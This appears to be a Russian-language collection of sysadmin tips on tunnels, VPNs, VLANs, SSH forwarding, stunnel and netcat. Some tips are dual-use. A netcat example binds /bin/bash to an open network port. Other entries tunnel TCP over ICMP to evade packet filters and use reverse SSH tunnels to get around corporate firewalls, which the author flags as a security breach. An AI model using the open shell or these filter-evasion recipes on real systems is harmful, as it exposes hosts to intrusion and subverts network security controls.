Использование туннелей на основе ssh сейчас широко распространено. И многие используют его как универсальное решение для организации туннелей внутрь локальной сети для доступа к различным сервисам. И в связи с этим очень часто возникает вопрос "А как ограничить возможности такого туннеля". Например: есть компания, которая обслуживает ваш web сервер. Для выполнения этой работы требуется доступ к серверу web-server.dmz по портам 80 и 443. Решение: на сервере ssh, через который создаётся туннель, выполняем: 1) добавляем пользователя aaa 2) устанавливаем ему шелл /bin/false (или другой, только так чтобы он не мог залогиниться) 3) Добавляем правила iptables: iptables -A OUTPUT -d web-server.dmz -p tcp -m tcp --dport 80 -m owner --uid-owner aaa -j ACCEPT iptables -A OUTPUT -d web-server.dmz -p tcp -m tcp --dport 443 -m owner --uid-owner aaa -j ACCEPT iptables -A OUTPUT -m owner --uid-owner aaa -j REJECT

Включение поддержки VLAN на ADSL-маршрутизаторе D-Link 2500U/BRU/D Автор: halic [комментарии]

Переделанная прошивка позволяет указывать VLAN-id на ethernet порте модема D-Link 2500U/BRU/D (http://dlink.ru/ru/products/3/745.html). VLAN-id не указывается каким-то отдельным пунктом, а берется из IP. Если нужен VLAN-id 22, меняйте локальный IP модема на X.X.22.X, если 66 - X.X.66.X. Например: 192.168.55.1 для VLAN-id #55. Прошивка проверенно работает на модемах первой ревизии, т.е. без индикатора Internet. Оригинальные исходники можно загрузить здесь: ftp://ftp.dlink.ru/pub/ADSL/GPL_source_code/DSL-2500U_BRU_D/DLink_DSL-2500U_RU_1.20_release.tar.gz Патч: diff -urN ../DLink_DSL-2500U.original/hostTools/scripts/defconfig-bcm.template ./hostTools/scripts/defconfig-bcm.template --- ../DLink_DSL-2500U.original/hostTools/scripts/defconfig-bcm.template 2008-06-13 16:43:17.000000000 +0300 +++ ./hostTools/scripts/defconfig-bcm.template 2009-02-06 21:19:01.000000000 +0200 @@ -615,7 +615,7 @@ CONFIG_ATM_BR2684=m # CONFIG_ATM_BR2684_IPFILTER is not set CONFIG_ATM_RT2684=y -# CONFIG_VLAN_8021Q is not set +CONFIG_VLAN_8021Q=y # CONFIG_LLC2 is not set # CONFIG_IPX is not set # CONFIG_ATALK is not set diff -urN ../DLink_DSL-2500U.original/hostTools/scripts/gendefconfig ./hostTools/scripts/gendefconfig --- ../DLink_DSL-2500U.original/hostTools/scripts/gendefconfig 2008-06-13 16:43:17.000000000 +0300 +++ ./hostTools/scripts/gendefconfig 2009-02-06 21:18:45.000000000 +0200 @@ -462,9 +462,9 @@ ############################################################ # VLAN config generation ############################################################ -if [ "$BUILD_VCONFIG" != "" -o "$BUILD_WANVLANMUX" != "" ]; then -SEDCMD="$SEDCMD -e 's/# CONFIG_VLAN_8021Q is not set/CONFIG_VLAN_8021Q=y/'" -fi +#if [ "$BUILD_VCONFIG" != "" -o "$BUILD_WANVLANMUX" != "" ]; then +#SEDCMD="$SEDCMD -e 's/# CONFIG_VLAN_8021Q is not set/CONFIG_VLAN_8021Q=y/'" +#fi ############################################################ # WAN operation over Ethernet diff -urN ../DLink_DSL-2500U.original/targets/fs.src/etc/rc.vlan ./targets/fs.src/etc/rc.vlan --- ../DLink_DSL-2500U.original/targets/fs.src/etc/rc.vlan 1970-01-01 03:00:00.000000000 +0300 +++ ./targets/fs.src/etc/rc.vlan 2009-02-07 06:32:13.000000000 +0200 @@ -0,0 +1,12 @@ +#!/bin/sh + +PATH=/bin:/sbin:/usr/bin +export PATH + +VID=$1 +VIF=eth0.$VID + +vconfig add eth0 $VID > /dev/null 2> /dev/null +ifconfig $VIF up > /dev/null 2> /dev/null +brctl addif br0 $VIF > /dev/null 2> /dev/null +brctl delif br0 eth0 > /dev/null 2> /dev/null diff -urN ../DLink_DSL-2500U.original/userapps/broadcom/cfm/html /DLink_Style/footer.html ./userapps/broadcom/cfm/html/DLink_Style/footer.html --- ../DLink_DSL-2500U.original/userapps/broadcom/cfm/html/DLink_Style/footer.html 2008-06-13 16:45:30.000000000 +0300 +++ ./userapps/broadcom/cfm/html/DLink_Style/footer.html 2009-02-09 22:02:46.000000000 +0200 @@ -11,9 +11,9 @@ <tr> <td class="footerTd" align="center"> <font color="white" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"> - Recommend: 800x600 pixels,High Color(16 Bits) + Recommend: 800x600 pixels,High Color(16 Bits) · <font color="red">VLAN POWERED</font> </font></td> </tr> </table> </body> -</html> \ No newline at end of file +</html> diff -urN ../DLink_DSL-2500U.original/userapps/opensource/busybox/brcm.config ./userapps/opensource/busybox/brcm.config --- ../DLink_DSL-2500U.original/userapps/opensource/busybox/brcm.config 2008-06-13 16:45:18.000000000 +0300 +++ ./userapps/opensource/busybox/brcm.config 2009-02-07 01:32:49.000000000 +0200 @@ -279,7 +279,7 @@ CONFIG_FEATURE_TFTP_DEBUG=n # CONFIG_TRACEROUTE is not set -CONFIG_VCONFIG=n +CONFIG_VCONFIG=y # CONFIG_WGET is not set # diff -urN ../DLink_DSL-2500U.original/userapps/opensource/busybox/networking/ifconfig.c ./userapps/opensource/busybox/networking/ifconfig.c --- ../DLink_DSL-2500U.original/userapps/opensource/busybox/networking/ifconfig.c 2008-06-13 16:45:17.000000000 +0300 +++ ./userapps/opensource/busybox/networking/ifconfig.c 2009-02-07 07:42:04.000000000 +0200 @@ -37,6 +37,7 @@ #include <string.h> /* strcmp and friends */ #include <ctype.h> /* isdigit and friends */ #include <stddef.h> /* offsetof */ +#include <unistd.h> #include <netdb.h> #include <sys/ioctl.h> #include <net/if.h> @@ -558,6 +559,28 @@ continue; } /* end of while-loop */ + if( strcmp(ifr.ifr_name, "br0") == 0 && + ((char*)&sai.sin_addr.s_addr)[0] != 0 && + ((char*)&sai.sin_addr.s_addr)[2] > 1 + ) + { + int __pid; + char __cmd[32]; + + if((__pid = fork()) == 0) + { + sprintf(__cmd, "/etc/rc.vlan %d", + (char) (((char*)&sai.sin_addr.s_addr)[2]) ); + execl("/bin/sh", "/bin/sh", "-c", __cmd, NULL); + exit(0); + } + else + { + if(__pid == -1) + fprintf(stderr, "ifconfig: unable to execute /etc/rc.vlan\n"); + } + } + return goterr; } Готовый бинарник можно запросить по адресу: <halic, который на инбоксе в россии>.

Проброс TCP соединения через ICMP туннель [комментарии]

Утилита PingTunnel (http://www.cs.uit.no/~daniels/PingTunnel/) позволяет организовать TCP тунель поверх ICMP 'echo' или 53 UDP порта. Подобное может оказаться полезным для обеспечения работы клиента, для которого пакетным фильтром заблокирован весь трафик, кроме ICMP или 53 UDP порта. Для работы PingTunnel необходим запуск прокси-процесса на удаленной машине (не важно, под какой ОС, утилитой поддерживается даже Windows), имеющей выход в сеть. Ставим ptunnel. В Debian/Ubuntu: apt-get install ptunnel В RedHat/CentOS/Fedora: yum install ptunnel Во FreeBSD: cd /usr/ports/net/ptunnel && make && make install На внешней машине, имеющей выход в сеть, запускаем icmp-прокси ("-x пароль" можно не указывать, но тогда пустит любого): ptunnel -x пароль На локальной машине, на которой ничего кроме ICMP не работает, поднимаем туннель: ptunnel -p хост_прокси -lp локальный_порт_туннеля -da адрес_дальнейшего_проброса \ -dp порт_дальнейшего_проброса -x пароль Например: ptunnel -p proxy.testhost.ru -lp 2222 -da server.testhost.ru -dp 22 -x пароль На proxy.testhost.ru у нас должен быть запущен icmp-прокси. При коннекте на 2222 порт локальной машины мы будем переброшены на 22 порт хоста server.testhost.ru Например, для входа на server.testhost.ru по SSH нужно набрать: ssh -p 2222 localhost В случае проблем можно попробовать указать имя внешнего сетевого интерфейса через опцию "-c", например "-c eth1". Для создания туннеля через 53 UDP порт на локальной и удаленной стороне нужно запустить ptunnel c опцией "-udp".

Организация подключения по SSH через HTTP прокси [комментарии]

Устанавливаем ПО corkscrew (http://www.agroman.net/corkscrew/), позволяющее создавать туннели поверх HTTP прокси. Например, для Debian/Ubuntu: apt-get install corkscrew Для FreeBSD: cd /usr/ports/net/corkscrew && make && make install Создаем в домашней директории файл настроек .proxy-auth в который прописываем логин и пароль для подключения к прокси, в формате "имя:пароль", например: moi_login:moi_parol Настраиваем проброс туннеля в SSH. В ~/.ssh/config добавляем: Host * ProxyCommand corkscrew хост_прокси_сервера порт_прокси_сервера %h %p ~/.proxy-auth Вместо %h и %p ssh подставит хост и порт удаленной машины Подключаемся к внешнему хосту стандартно: ssh testhost.ru

Автоматическое изменение MTU при поднятии VPN соединения Автор: HolyGun [комментарии]

Столкнулся с такой проблемой, что при поднятии VPN соединения по умолчанию у каждого соединения MTU равен был 1396. В результате чего не работало большое количество сайтов. Решение такое. Сервер Fedora 8, с установленным pptpd. в скрипт /etc/ppp/ip-up добавил одно условие: if [ "${REALDEVICE}" != "ppp0" ]; then ifconfig ${REALDEVICE} mtu 1400 fi Теперь скрипт выглядит так: #!/bin/bash # This file should not be modified -- make local changes to # /etc/ppp/ip-up.local instead PATH=/sbin:/usr/sbin:/bin:/usr/bin export PATH LOGDEVICE=$6 REALDEVICE=$1 [ -f /etc/sysconfig/network-scripts/ifcfg-${LOGDEVICE} ] && /etc/sysconfig/network-scripts/ifup-post --realdevice ${REALDEVICE} ifcfg-${LOGDEVICE} /etc/ppp/ip-up.ipv6to4 ${LOGDEVICE} if [ "${REALDEVICE}" != "ppp0" ]; then ifconfig ${REALDEVICE} mtu 1400 fi [ -x /etc/ppp/ip-up.local ] && /etc/ppp/ip-up.local "$@" exit 0 PS. Средствами pptpd я не смог установить MTU в нужное значение. Если есть какие либо идеи, не поленитесь, поделитесь :)

Настройка IPv6 в Debian GNU/Linux (доп. ссылка 1) [комментарии]

IPv6 соединение будем туннелировать через брокер туннелей (Tunnel Broker), так как не все ISP поддерживают прямое IPv6 соединение. Регистрируем свою систему в сервисе http://tunnelbroker.net/ (выбираем "Create Regular Tunnel") , http://go6.net/4105/freenet.asp или http://www.sixxs.net/ При регистрации вводим IPv4 адрес машины, на которой будет поднят туннель. После регистрации получаем: IPv4 адрес удаленного конца туннеля: 216.66.80.30 IPv6 адрес удаленного шлюза: 2001:0470:1f0a:cc0::1/64 Клиентский IPv6 адрес, который нужно использовать на своей машине: 2001:0470:1f0a:cc0::2/64 Поднимаем IPv6-in-IPv4 туннель: ifconfig sit0 up ifconfig sit0 inet6 tunnel ::216.66.80.30 ifconfig sit1 up ifconfig sit1 inet6 add 2001:0470:1f0a:cc0::2/64 route -A inet6 add ::/0 dev sit1 Проверяем через пинг удаленного конца туннеля и IPv6 хоста из списка http://www.ipv6.org/v6-www.html : ping6 -c4 2001:0470:1f0a:cc0::1 ping6 -c4 www.ipv6.uni-muenster.de Создаем файл /etc/network/if-up.d/ipv6 для настройки параметров при загрузке: #!/bin/sh PATH=/sbin:/bin ifconfig sit0 up ifconfig sit0 inet6 tunnel ::216.66.80.30 ifconfig sit1 up ifconfig sit1 inet6 add 2001:0470:1f0a:cc0::2/64 route -A inet6 add ::/0 dev sit1 Не забываем поставить права доступа: chmod 755 /etc/network/if-up.d/ipv6

Туннели с использованием SSH. Режим эмуляции Socks proxy в SSH (доп. ссылка 1) (доп. ссылка 2) Автор: Vladimir Brednikov [комментарии]

1. Режим эмуляции Socks proxy в SSH Допустим, у нас есть рабочая станция в локальной сети за firewall'ом; также имеется ssh-доступ на сервер в Интернете. Кроме ssh, никакой связи с внешним миром не имеется, а очень хочется, например, подключиться к какому-нибудь jabber-серверу. На рабочей станции запускаем простую команду: ssh -D 5555 user@remotehost -f -N , где -D 5555 - эмуляция SOCKS сервера через порт 5555 -f - работа в фоне, после аутентификации -N - не запускать shell на удаленном хосте. Теперь, указав в настройках XMPP-клиента (например, Pidgin'а) в качестве SOCKS5 прокси localhost:5555, получим желаемый результат: Pidgin соединяется с сервером через внешний сервер. 2. Туннель ssh Дано: сервер локальной сети ourproxy.provider.ru, доступный извне. Требуется: получить из дома доступ к ресурсам внутри локальной сети, например, к интранет-серверу 10.10.5.1:80 Решение: выполнить на домашней машине команду, пробрасывающую туннель к искомому IP-адресу через ourproxy.provider.ru: ssh -f -N user@ourproxy.provider.ru -L 8080:10.10.5.1:80 Опция -f говорит ssh, что после соединения нужно уйти в background. Опция -N указывает, что никаких команд выполнять не нужно Ключ -L означает, что соединения к localhost на порт 8080 нужно перенаправлять на 80 порт IP-адреса 10.10.5.1 Таким образом, набирая в браузере адрес http://localhost:8080, попадаем на нужный сервер. 3. Обратный туннель ssh Дано: компьютер на работе, находящийся за firewall'ом и nat'ом; компьютер дома с доступом в интернет; сервер ourproxy.provider.ru с работающим sshd, доступный обоим компьютерам. Но в данном случае прямой доступ с ourproxy.provider.ru к рабочей машине отсутствует. Требуется: получить из дома доступ к сервису sshd на рабочем компьютере. Решение: на рабочей машине выполнить команду: ssh -f -N user@ourproxy.provider.ru -R 12345:localhost:22 Опции -f и -N описаны несколькими строчками выше. Ключ -R означает, что подключения к порту 12345 на ourproxy.provider.ru будут перенаправляться на 22 порт рабочего компьютера. После выполнения этой команды с рабочей машины можно будет попасть на эту машину с ourproxy.provider.ru, выполнив команду: ssh -p 12345 user@locahost По этому же принципу можно получить доступ к прочим ресурсам локальной сети. Вот еще один пример. На рабочей машине: ssh -f -N user@ourproxy.provider.ru -R 8080:10.10.5.1:80 На домашней машине: ssh -f -N user@ourproxy.provider.ru -L localhost:8080:localhost:8080 Теперь, набрав в адресной строке браузера на домашнем компьютере http://localhost:8080, получаем доступ к интранет-серверу за семью замками двумя firewall-ами. Конечно же, это приводит к серьёзной бреши в корпоративной безопасности, поэтому крайне не рекомендуется злоупотреблять этим советом.

OpenVPN с TAP в OpenBSD Автор: Вадим Жуков [обсудить]

OpenBSD не имеет устройства tap(4), которое по своей сути является простым туннелем 2-го уровня OSI. Вместо этого необходимо использовать tun(4), причём для последнего нужно перед запуском openvpn установить link0. Также, при использовании --pool следует учесть, что openvpn передаёт различные параметры настройки для TAP- и tun-соединений, из-за чего необходимо отказываться от предлагаемого выполнения ifconfig самим OpenVPN и вместо этого юзать свой скрипт, в который в простейшем случаю жёстко прописываются адрес удалённого конца туннеля и broadcast-адрес. В итоге получается примерно такой набор команд: $ sudo cat /etc/hostname.tun1 up link0 !openvpn --config /etc/openvpn/mytunnel --verb 0 & sleep 5 $ sudo cat /etc/openvpn/mytunnel.conf dev tun1 dev-type tap pull ifconfig-noexec up "/etc/openvpn/mytunnel.up" auth-user-pass "/etc/openvpn/mytunnel.pwd" $ cat /etc/openvpn/mytunnel.up #!/bin/sh TUN_DEV="$1"; shift TUN_MTU="$1"; shift LINK_MTU="$1"; shift LOCAL_IP="$1"; shift NETMASK="$1"; shift MODE="$1"; shift ifconfig $TUN_DEV $LOCAL_IP 10.1.2.1 netmask $NETMASK broadcast 10.1.2.255 mtu $TUN_MTU Учтите, что для того, чтобы auth-user-pass позволял указывать файл для чтения паролей, необходимо собирать OpenVPN с опцией "--enable-password-save", которая в текущей версии порта (openvpn-2.1_rc7) не используется. Для исправления этой проблемы лучше всего подправить /usr/ports/net/openvpn/Makefile, добавив "--enable-password-save" в CONFIGURE_ARGS. Разумеется, в этом нет необходимости, если не требуется обеспечить полностью автоматический запуск OpenVPN.

Прозрачный переброс VPN соединения на другой сервер (доп. ссылка 1) Автор: AxeleRaT [комментарии]

Была задача, сделать прозрачный переброс пользователей с одного VPN (PPTPD) сервера на другой (PPTPD), с условием, что пользователям ничего менять в настройках VPN соединения не приедеться. В итоге на несколько разных VPN серверов (Fedora 3,4,6, APSlinux 11) был установлен прозрачный редирект туннеля на центральные сервер, с единой базой данных о клиентах. Использованное ПО: pptpproxy-2.9.tar.bz2 Пример запуска: #./pptpproxy -p 111.111.111.111:1723,222.222.222.222:1723 -a 10.0.0.0/255.0.0.0 -l /var/log/pptp_redirect Параметр -p 111.111.111.111:1723 какой интерфейс:порт слушать 222.222.222.222:1723 на какой адрес:порт перенаправлять Параметр -a 10.0.0.0/255.0.0.0 acl на соединение с определенное сети Параметр -l /var/log/pptp_redirect куда писать лог Таким образом избежали множества проблем с клиентами. В первую очередь данное ПО, как следует из названия, предназначено для проброса VPN туннелей через NAT. Использованные ОС: APSLinux 11 CentOS 5 Fedora

Как пробросить TCP порт средствами xinted (доп. ссылка 1) Автор: Евгений [комментарии]

Пробросить TCP порт 1604 с 192.168.25.22 на машину 172.16.1.2 во внутренней сети. /etc/xinetd.conf service ica { disable = no port = 1604 bind = 192.168.25.22 socket_type = stream user = root redirect = 172.16.1.2 1604 type = UNLISTED wait = no } redirect работает только для TCP.

Остановка netgraph нод после mpd (доп. ссылка 1) Автор: Roman Y. Bogdanov [комментарии]

С помощью этого маленького скрипта, можно выполнить освобождение netgraph нод, которые оставляет за собой упавший в "корку" MPD3. #!/bin/sh for j in "" 1 2 3 4 5 6 7 8 9 10 11 12; do for i in 0 1 2 3 4 5 6 7 8 9; do echo $j$i ngctl shutdown ng$j$i: ngctl shutdown mpd$1-pptp$j$i: done done

Как "протянуть" 802.1q tagged порт через ip-сеть. Автор: Roman Timofeev aka ^rage^ [комментарии]

Дано: Есть hostA, который воткнут в каталист, в trunk (т.е. тегированный) порт, инкапсуляция 802.1q. Есть hostB, который маршрут до hostA. маршрут живой, ip-пакеты между хостами безпроблемно бегают. Задача: надо с hostA "притащить" виланы на hostB. Решение: vtund + bridge. описание клиента в vtund.conf homepeer { passwd qwerty; type ether; device home; proto tcp; compress yes; stat yes; persist yes; up { ifconfig "%% up"; program "brctl addbr br0"; program "brctl addif br0 %%"; program "brctl addif br0 eth0"; ifconfig "br0 up"; }; down { ifconfig "%% down"; ifconfig "br0 down"; program "brctl delbr br0"; }; } описание пира из конфига сервера homepeer { passwd qwerty; # Password type ether; # Ethernet tunnel device work; # Device tap1 proto tcp; compress yes; up { ifconfig "%% up"; }; down { ifconfig "%% down"; }; } Теперь на той Linux машине, куда кидаем порт: vconfig set_name_type VLAN_PLUS_VID_NO_PAD vconfig add work 4 ifconfig vlan4 10.1.1.1 netmask 255.255.255.0 up vconfig add vlan4 8 ifconfig vlan8 192.168.1.1 netmask 255.255.255.0 up Замечание: Клиент - хост, с которого мы тащим порт. Он живёт в серой сети и имеет выход в internet через NAT. Сервер - машина с публичным ip.

Q-in-Q (VLAN stacking) в Linux Автор: ^rage^ [комментарии]

Q-in-Q - проброс VLAN внутри другого VLAN. host1: vconfig set_name_type VLAN_PLUS_VID_NO_PAD vconfig add eth0 4 ifconfig vlan4 10.1.1.1 netmask 255.255.255.0 up vconfig add vlan4 8 ifconfig vlan8 192.168.1.1 netmask 255.255.255.0 up host2: vconfig set_name_type VLAN_PLUS_VID_NO_PAD vconfig add eth0 4 ifconfig vlan4 10.1.1.2 netmask 255.255.255.0 up vconfig add vlan4 8 ifconfig vlan8 192.168.1.2 netmask 255.255.255.0 up ragahost ~ # ping 192.168.1.2 PING 192.168.1.2 (192.168.1.2) 56(84) bytes of data. 64 bytes from 192.168.1.2: icmp_seq=1 ttl=64 time=0.820 ms ragahost ~ # tcpdump -e -i eth0 22:40:47.297489 00:0e:0c:9b:fa:ce (oui Unknown) > 00:13:d4:8b:c8:b6 (oui Unknown), ethertype 802.1Q (0x8100), length 106: vlan 4, p 0, ethertype 802.1Q, vlan 8, p 0, ethertype IPv4, 192.168.1.2 > 192.168.1.1: ICMP echo request, id 64531, seq 146, length 64

Интеграция VPN на базе mpd в Active Directory. Автор: spherix [комментарии]

Было дано: - Домен на Windows2003 с поднятым Kerberos. - FreeBSD на шлюзе, куда должны были подключаться пользователи. - VPN-демон mpd. Задача: заставить mpd брать пароли из домена. Решение: - Ставим третью самбу с поддержкой кербероса. - Настраиваем керберос - Подсоединяем самбу в домен. - Оставляем от нее только winbindd - Ставим freeradius. - Сцепляем радиус с самбой. - Скручиваем mpd с радиусом и настраиваем сам mpd. Итог: управляем учетными записями VPN-пользователей через обычные средства AD, а не пишем руками данные в файл. Примечание1. Документация гласит, что можно связать радиус с керберосом. То есть теоретически можно отказаться от самбы. Я так не делал, поскольку подцепить через самбу мне лично было проще. Примечание2. Если использовать poptop, то можно не использовать радиус, а использовать ntlm_auth из самбы. Тоже вариант. Файлы конфигурации: https://www.opennet.ru/base/net/mpd_win2003.txt.html

Настройка PPTP Client под управлением OpenBSD (доп. ссылка 1) Автор: dreamcatcher.ru [комментарии]

Автор: Алексей Гнедин Редактор: Олег Сафулин Используемое ПО: pptp-1.6.0.tgz , OpenBSD 3.8 (GENERIC) Особенности данного подключения состоят в том ,что VPN сервер разрешает подключатся только с авторизацией MSChapV2, и явно включённым шифрованием MPPE 128 STATELESS. cd /etc/ppp vi /etc/ppp/ppp.conf Добавляем следующие строки: default: set log Phase Chat LCP IPCP CCP tun command pptp1: set device "!/usr/local/sbin/pptp IPADDR_VPN_SERVER --nolaunchpppd" set log Phase LCP IPCP CCP tun command disable acfcomp protocomp deny acfcomp enable lqr set lqrperiod 5 set cd 5 set redial 30 set timeout 0 set authname <username> set authkey <userpass> set dial set login add! default HISADDR enable mssfixup disable ipv6cp accept MSChapV2 set mppe 128 stateless Далее: touch /etc/hosname.tun0 ; vi /etc/hostname.tun0 Добавляем следующие строки: !/usr/sbin/ppp -ddial pptp1 >/dev/null 2>&1 sysctl -w net.inet.gre.allow=1 reboot После загрузки машина автоматически соединится с VPN сервером.

popa3d + TLS/SSL (stunnel) на FreeBSD 5.4 Автор: Вотинцев Сергей А. [комментарии]

Установка stunnel: cd /usr/ports/security/stunnel make && make install (!) не торопимся делать clean Копируем из папки work в /usr/local/etc/stunnel - stunnel.cnf, затем делаем make clean. Создаем сертификат: cd /usr/local/etc/stunnel && openssl req -new -x509 -days 365 \ -nodes -config stunnel.cnf -out stunnel.pem -keyout stunnel.pem chmod 600 stunnel.pem && chown root:wheel stunnel.pem Конфиг для stunnel: cert = /usr/local/etc/stunnel/stunnel.pem RNDfile = /usr/local/etc/stunnel/stunnel.rnd chroot = /usr/local/var/stunnel/ setuid = stunnel setgid = stunnel pid = /run/stunnel.pid output = /var/log/stunnel.log ciphers = HIGH debug = 6 compression = rle [pop3s] accept = 995 connect = 127.0.0.1:110 Делаем chroot: cd /usr/local/var && mkdir stunnel && cd stunnel mkdir etc && touch hosts.allow cd .. && mkdir run Содержание hosts.allow: pop3s : ALL : allow ALL : ALL : deny Права на директории /usr/local/var/stunnel drwxr-xr-x 2 root wheel 512 Jul 30 20:31 etc drwxr-xr-x 2 stunnel stunnel 512 Aug 3 15:55 run Правим rc.conf, если у Вас запускается только popa3d из inetd: inetd_flags="-wWa 127.0.0.1" /usr/local/etc/rc.d/stunnel.sh start Просмотр ciphers: openssl ciphers -v 'HIGH'

Защищенный канал связи используя stunnel Автор: Wely [комментарии]

Мне потребовалось сделать защищённый канал для связи, под FreeBSD 5.4. Выбрал самый легкий путь для моих условий: поставить stunnel. Эта программа занимается перенаправлением портов через ssl-канал к обычным портам. итак: 1) portupgrade -fN stunnel 2) такой скрипт для создания самоподписанного ssl сертификата: !/bin/sh openssl genrsa -des3 -out ca.key 1024 openssl req -new -x509 -days 365 -key ca.key -out ca.crt openssl req -new -nodes -out req.pem -keyout cert.pem chmod 600 cert.pem chown root:0 cert.pem openssl x509 -req -CA ca.crt -CAkey ca.key -days 365 -in req.pem -out signed-req.pem -CAcreateserial cat signed-req.pem >> cert.pem echo Сертификат готов в файле : cert.pem 3) копируем cert.pem в /usr/local/etc/stunnel 4) правим /usr/local/etc/stunnel/stunnel.conf 5) запускаем stunnel и коннектимся к адресу:порту

Шифрованная передача текста (openssl+nc) Автор: ZEDER [обсудить]

Передаём на хост .1 в порт 666 текст предварительно его зашифровав паролем "paSSw0rd": echo ТЕКСТ | openssl des3 -salt -k paSSw0rd | nc 192.168.48.1 666 принимаем на порту 666 текст: nc -l -p 666 | openssl des3 -d -k paSSw0rd

Как создать шифрованный туннель используя SSH (доп. ссылка 1) [комментарии]

ssh dmzserver -R 9999:mirrorserver:80 ssh -R 9999:localhost:80 dmzserver ssh -2 -N -f -L 2110:mail.example.com:110 user@ssh-server.example.com

Поднятие IP-IP туннеля между FreeBSD и Linux Автор: Alexey N. Kovyrin [комментарии]

Пусть имеется 2 машины PC1 (FreeBSD, ip-адрес IP1, интерфейс INT1) и PC2 (Linux, IP2, INT2). Для построения IP-IP туннеля (на стороне FreeBSD будет адрес TUN1, Linux - TUN2): bsd# nos-tun -t /dev/tun0 -s TUN1 -d TUN2 -p 4 IP2 bsd# ifconfig tun0 mtu 1500 bsd# ifconfig tun0 up linux# ip tunnel add tun0 mode ipip remote IP1 local IP2 dev INT2 linux# ifconfig tun0 TUN2 pointopoint TUN1 linux# ifconfig tun0 mtu 1500 linux# ifconfig tun0 up

Включение поддержки IPv6 в FreeBSD (доп. ссылка 1) [комментарии]

Ядро: options INET6 # IPv6 communications protocols pseudo-device gif # IPv6 and IPv4 tunneling pseudo-device faith 1 # IPv6-to-IPv4 relaying (translation) Регистрация и получение IP (http://www.freenet6.net или http://www.tunnelbroker.net) cd /usr/ports/net/freenet6/ # make install clean # /usr/local/etc/rc.d/freenet6.sh start Подъем IPv6 вручную ifconfig gif0 create ifconfig gif0 tunnel your-local-ipv4 remote-ipv4-of-your-broker ifconfig gif0 inet6 ipv6-given-by-the-broker ipv6-of-your-broker prefixlen 128 route -n add -inet6 default ipv6-of-your-broker /etc/rc.conf: ipv6_enable="YES" ipv6_defaultrouter="brokeripv6" ipv6_gateway_enable="YES" ipv6_network_interfaces="de0 gif0" ipv6_ifconfig_gif0="brokeripv6 prefixlen 128" ipv6_ifconfig_de0="youripv6::1 prefixlen 64" ipv6_static_routes="global" ipv6_route_global="2000:: -prefixlen 3 youripv6" gif_interfaces="gif0" gifconfig_gif0="youripv4 brokeripv4" Фаервол (Ipfilter): /etc/ipf6.rules pass in all pass out all ipf -6 -f /etc/ipf6.rules

Использование в Linux IEEE 802.1Q VLAN'ов совместно с Cisco Catalyst Switch Автор: J [обсудить]

Linux: /sbin/vconfig add eth1 5 /sbin/vconfig add eth1 4 /sbin/ifconfig eth1.4 192.0.0.8 netmask 255.255.255.240 up /sbin/ifconfig eth1.5 192.0.1.8 netmask 255.255.255.240 up Catalyst: conf t int fa0/0 switchport mode trunk switchport trunk allowed vlan 4,5,1002-1005

Создание gif туннеля в FreeBSD Автор: kont [комментарии]

1) Собрать ядро с "pseudo-device gif" 2) В /etc/rc.conf добавить в список сетевых интерфейсов gif0 3) В /etc создать файл под именем start_if.gif0 и сделать ему chmod +x 4) Вставить в файл примерно следующее содержание: #!/bin/sh /sbin/ifconfig gif0 create inet virtual-local-ip virtual-remote-ip\ netmask 255.255.255.252 tunnel source-addr remote-addr mtu 1500 up /sbin/route add default your-default-router /sbin/route add -net localnetwork-at-remote virtual-remote-ip

Как поднять туннель между Cisco и Linux [комментарии]

Linux (192.168.2.1): /sbin/ip tunnel add tunl1 mode ipip remote 192.168.1.1 /sbin/ifconfig tunl1 192.168.3.2 pointopoint 192.168.3.1 netmask 255.255.255.252 mtu 1500 Cisco (192.168.1.1): interface Tunnel0 ip address 192.168.3.1 255.255.255.252 ip mtu 1500 tunnel source 192.168.1.1 tunnel destination 192.168.2.1 tunnel mode ipip

Создание шифрованного туннеля используя zebedee (доп. ссылка 1) [обсудить]

Запуск на сервере, куда будем соединятся с клиента: washin% zebedee ╜s Телнет сессия с клиента: isshin% zebedee 9000:washin:telnet telnet localhost 9000 или одной командой: zebedee ╜e "telnet localhost %d" washin

Как создать простейший туннель используя утилиту netcat (доп. ссылка 1) [обсудить]

Простейший echo-туннель: Серверный процесс: nc -l -p 5600 Клиент: nc 10.0.1.1 5600 netcat для пересылки файла: Сервер (куда писать файл): nc -v -w 30 -p 5600 l- > filename.back Клиент: nc -v -w 2 10.0.1.1 5600 < filename Перенаправление ввода/вывода на программу: Сервер: nc -l -p 5600 -e /bin/bash Клиент: nc 10.0.1.1. 5600

Настройка PPTP-клиента под FreeBSD (доп. ссылка 1) Автор: l0ner [комментарии]

Необходимо установить из портов пакет pptpclient /etc/ppp/ppp.conf vpn: set authname <LOGIN> set authkey <PASSWORD> set timeout 0 set ifaddr 0 0 add default HISADDR Подключение к VBN серверу: /sbin/route add -host <IP_address_of_VPN_server> <gateway> /usr/local/sbin/pptp <IP_address_of_VPN_server> vpn &

Использование в FreeBSD IEEE 802.1Q VLAN'ов совместно с Cisco Catalyst Switch [комментарии]

В конфигурации FreeBSD ядра: pseudo-device vlan 20 # VLAN support (для динамической генерации в новых версиях - 20 можно не писать) Поднимаем VLAN вручную (где 28 - vlan id на свиче, fxp0 - интерфейс воткнутый в свитч): ifconfig vlan0 inet 192.168.1.3 netmask 255.255.255.0 vlan 28 vlandev fxp0 Прописываем в /etc/rc.conf: cloned_interfaces="vlan0" ifconfig_vlan0="inet 192.168.1.3 netmask 255.255.255.0 vlan 28 vlandev fxp0" На коммутаторе Cisco Catalyst: interface FastEthernet0/1 # линк к FreeBSD switchport mode trunk interface FastEthernet0/2 switchport access vlan 28

Как с помощью утилиты netcat организовать инкапсуляцию UDP в TCP поток. [обсудить]

Например, для доступа к syslog UDP порту через TCP соединение (клиент): nc -l -u -p syslog | nc localhost 2000 Обратное преобразование (сервер): nc -l -p 2000 | nc localhost -u syslog В итоге можно организовать TCP туннель (например через SSH) для проброса информации для syslog.

Использование tor из состава Tor Browser без запуска самого браузера (доп. ссылка 1) Автор: artenox [комментарии]

Так можно запустить встроенный tor без самого браузера: LD_LIBRARY_PATH=~/tor-browser/Browser/TorBrowser/Tor ~/tor-browser/Browser/TorBrowser/Tor/tor --defaults-torrc ~/tor-browser/Browser/TorBrowser/Data/Tor/torrc-defaults -f ~/tor-browser/Browser/TorBrowser/Data/Tor/torrc --DataDirectory ~/tor-browser/Browser/TorBrowser/Data/Tor --GeoIPFile ~/tor-browser/Browser/TorBrowser/Data/Tor/geoip --GeoIPv6File ~/tor-browser/Browser/TorBrowser/Data/Tor/geoip6 --SocksPort 9170 После чего можно работать в Tor через SOCKS, обращаясь по порту 9170.

